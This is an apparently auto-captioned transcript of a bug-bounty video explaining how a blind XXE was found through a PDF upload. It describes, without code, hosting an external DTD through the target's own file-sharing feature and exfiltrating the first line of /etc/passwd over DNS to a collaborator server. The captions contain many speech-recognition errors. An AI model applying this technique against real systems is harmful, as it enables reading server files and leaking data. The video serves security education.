A $7.500 BUG BOUNTY Bug explained, step by step. (BLIND XXE OOB over DNS) - REDUX

Video Statistics and Information

Video
Captions Word Cloud
Reddit Comments
Captions
oh hi my name is tech and I just love testing for file uploads especially the blind ones you see that seems to be the thing with file uploads nowadays they tend to use that blind sooner or later the malicious content that you provide and send to the system will be processed it might be tomorrow or some other day but one day your content will be touched by something or someone that's exactly what happened with this really sweet blind exes that I found using a PDF file upload as the first part of my stage payload but before we break down how I found that bug and how exploited it I would like to say thank you thank you from the bottom of my heart for taking your time to watch this and joining my YouTube channel and if you are into bounties hacking conventions and everything that comes with a bounty lifestyle then help me to grow this channel by hitting the subscribe button and leave a comment below and that way you're helping me so I can help others to become better hackers so I was testing this site for file upload functionality and it was a two bit kind of shat thingy where you also could attach files to it and in the conversation even share those files to your non signed up friends this feature will play a significant role later on so I tested more or less for everything you know all the image traffic versions PS file is through these energies PHP payloads command injections you name it it was a payload for file uploads I tried it so I was kind of running out of options and then I remember in the blog post that someone somewhere had mentioned that you're able that you're able to sneak in XML entities into PDF files to the fact that and those meta tags or more or less all XML so I reckon I give that a go as well so I fired up a burp collaborator got a URL and modified my PDF file with that fresh collaborator I tried everything this was the last one it had to work so I up there and I pushed refresh nothing happened I'm like I'm out of options and I took a break I went to the kitchen and I got some waters and the leftovers put on a fresh pot of coffee and and and go back again when I go back I saw that my payload had been activated I had a fresh deal in DNS lookup sitting in my collaborator window and I'm like what's this but it was no age to be request so that means that other the target is heavily firewalled and not allowed any kind of vigorous outgoing traffic but it was apparently forwarding DNS requests to an internal EMS server or it could just be a false positive and to be sure I ran a quick host reverse lookup that showed me the PRT of the in scope domain from the IP address and I'm like yes yes I'm in scope the request that I made came from inside the data center Demming block that belonged to the target nice but to be really really sure I also did a who isn't IP to make sure that owls definitely inside the scope so I uploaded a PDF again but this time nothing happened why simply because I used the same collaborate a load and the design of DNS cache since Adina server already know my IP of my collaborator it just pulled it from its own cache so no out-of-band request for me which kind of sucked because that meant I needed to get a new collaborator for every single request that I was planning to make from now on there's been a few hours creating collaborator URLs testing all possible egress traffic or outgoing and I even tried all the internal DDT requests that I could find there's a great write-up on that I'll post it in the comments below check that one up but none of that worked so this system was hardness and I had no way to externally get it request going out to fetch my identity file and then he just hit me externally maybe if I uploaded the DDT file as a raw text file in charity publicly using the chat sharing thing maybe if I was lucky enough I can use that one so I'd pull out the fresh collaborator placed it in the entity tag of my raw file and uploaded it to the target I publicly shared it and made sure that I was able to fetch it with kernel without any distortion or a need for authentication I didn't want to risk anything here and just like that the final content came back without any issues hmm I was golden this had to work so I modified my request with a new shared URL and I sent it off wait a few seconds refreshed and boom there it was I successfully pulled the second part of the payload and now I was getting a full request of the DNS lookup for my secondary entity that was placed inside my DDT file hmm but I already knew that I would be unable to get any kind of file content or information inside let's say it's a password in a post request is the system you saw every firewall but the system did allow me to do DNS lookups so time to smuggle that content over DNS so I modified my payload in my text file my DDT file and I added the secondary part as a subdomain of my collaborator URL in a senator way yes and there was the first line of the Etsy password as a part of my DNS request DNS smuggling with our C's get the first line of the XE password base64 it and then send it over to your DNS then you get a smooth line and you can decode that later on the surface of common proof of concept but what if this parser had been time then I wouldn't be able to know simply because I was using collaborator and collaborator only works as long as you're having an active and that's why I'm nowadays using my own vine server and log systems if I leave a payload anywhere I know it's gonna call back eventually and I use unique sub mains for its I know its target that eventually went out in my log and if you want to know more about that I'm gonna have an upcoming tutorial explaining that so do subscribe and turn that bell function thingy on so you don't miss that I hope you like this if you did and smash it if you did like it and yeah until next time I love you hack the planet have a good one you
Info
Channel: STÖK
Views: 91,549
Rating: undefined out of 5
Keywords: bugbounty, bug bounty, hack, xxe, oob, blind, stok, stök, tutorial, explained, write up, file upload, hackerone, bugs, bugcrowd, pentesting website, pentesting, pentest, how to find xxe, how to look for xxe, xxe vulnerability, how to hack, how to get started in bug bounty, burp suite tutorial, burp suite for beginners, burp collaborator
Id: aSiIHKeN3ys
Channel Id: undefined
Length: 7min 35sec (455 seconds)
Published: Mon Mar 23 2020
Related Videos
Finally! HOW TO solve the INTIGRITI Easter XSS challenge using only Chrome DEVTOOLS!
STÖK
51K
VIM tutorial: linux terminal tools for bug bounty pentest and redteams with @tomnomnom
STÖK
184K
The Million-Dollar Hacker
Bloomberg Originals
2.1M
HOW TO GET STARTED IN BUG BOUNTY (9x PRO TIPS)
STÖK
624K
Easy $500 Vulnerabilities! // How To Bug Bounty
NahamSec
48K
The Truth About Bug Bounties
The Cyber Mentor
116K
Hacker101 - JavaScript for Hackers (Created by @STOKfredrik)
HackerOne
906K
Next Gen Hacker?
David Bombal
220K
Bug Bounty bootcamp // Get paid to hack websites like Uber, PayPal, TikTok and more
David Bombal
152K
Android App Bug Bounty Secrets
LiveOverflow
87K
Burp Suite tutorial: IDOR vulnerability automation using Autorize and AutoRepeater (bug bounty)
STÖK
148K
Beginner Bug Bounty Course | Web Application Hacking
Ryan John
192K
Cross-Site Scripting (XSS) Explained! // How to Bug Bounty
NahamSec
19K
Live Recon and Automation on Shopify's Bug Bounty Program with @TomNomNomDotCom
NahamSec
141K
Bug Bounty Injection | XML | XXE
Ryan John
6.8K
$0 👉🏼 $1,000/Month With Bug Bounties
NahamSec
47K
Bug Bounty | $2000 for SSRF bypass using DNS rebinding
Leet Cipher
32K
Note
Please note that this website is currently a work in progress! Lots of interesting data and statistics to come.